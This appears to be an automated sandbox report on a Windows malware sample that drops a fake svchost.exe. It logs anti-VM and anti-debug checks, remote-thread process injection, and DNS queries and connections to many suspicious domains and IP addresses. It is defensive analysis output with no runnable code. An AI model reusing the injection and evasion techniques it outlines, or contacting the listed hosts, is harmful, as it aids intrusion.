Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0133E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_0133E6B0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01327680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_01327680
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013FD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_013FD120
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01409910 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_01409910
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0140DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_0140DA50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0140DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_0140DAE8
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013FE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_013FE6B0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013E7680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_013E7680
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01539910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,8_2_01539910
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0152D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_0152D120
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0153DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,8_2_0153DA50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0153DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,8_2_0153DAE8
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01517680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_01517680
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0152E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_0152E6B0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0266E0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_0266E0FB
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1932849520.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
Source: uavINoSIQh.exe, 00000000.00000002.1360911750.000000000052E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Ssers\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLLR
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.00000000007C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: svchost.exe, 00000002.00000002.2603908208.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLL
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665250528.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556950074.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1888263431.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710622766.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1541855528.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080494255.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2017371048.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512365775.0000000000882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP TCPv6 Service Provider
Source: svchost.exe, 00000002.00000002.2604726321.0000000000848000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001488000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1833341709.0000000001318000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1833341709.0000000001340000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.0000000001408000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.00000000007C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pindows\system32\vmhgfs.DLL
Source: svchost.exe, 00000002.00000002.2604541014.000000000082B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWbF2|
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~j
Source: svchost.exe, 00000002.00000002.2606365223.0000000000884000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DefaultDefaultHyper-V RAWRSVP TCPv6 Service Provider
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.00000000012FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMW
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.00000000012B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: C:\Windows\apppatch\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_013379D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_013379D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_026578A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,2_2_026578A0
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]0_2_00406800
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]2_2_00406800
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02451360 mov eax, dword ptr fs:[00000030h]2_2_02451360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02451360 mov edx, dword ptr fs:[00000030h]2_2_02451360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02451000 mov eax, dword ptr fs:[00000030h]2_2_02451000
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_011C1360 mov eax, dword ptr fs:[00000030h]5_2_011C1360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_011C1360 mov edx, dword ptr fs:[00000030h]5_2_011C1360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_011C1000 mov eax, dword ptr fs:[00000030h]5_2_011C1000
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01341360 mov eax, dword ptr fs:[00000030h]6_2_01341360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01341360 mov edx, dword ptr fs:[00000030h]6_2_01341360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01341000 mov eax, dword ptr fs:[00000030h]6_2_01341000
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B1360 mov eax, dword ptr fs:[00000030h]8_2_014B1360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B1360 mov edx, dword ptr fs:[00000030h]8_2_014B1360
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B1000 mov eax, dword ptr fs:[00000030h]8_2_014B1000
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00401150 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,SetFilePointer,LockFile,ReadFile,UnlockFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr,0_2_00401150

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\apppatch\svchost.exeDomain query: vonyryk.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: volyquk.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: qexysev.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: pumywov.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 99.83.170.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: lymytuj.com
Source: C:\Windows\apppatch\svchost.exeDomain query: ganyzas.com
Source: C:\Windows\apppatch\svchost.exeDomain query: lyvymej.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 85.17.31.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vofybet.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 830000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 14A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1430000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 600000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 890000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1330000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1540000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1050000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exe Code function: 0_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401670
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_00401670
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02664CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_02664CC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 5_2_01344CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,5_2_01344CC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 6_2_01404CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_01404CC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 8_2_01534CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,8_2_01534CC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtSetInformationProcess: Direct from: 0x77542C5C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtAllocateVirtualMemory: Direct from: 0x77542B9C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtAdjustPrivilegesToken: Direct from: 0x77542EAC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtSetTimerEx: Direct from: 0x77537B2E
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtQueueApcThread: Direct from: 0x77542EEC
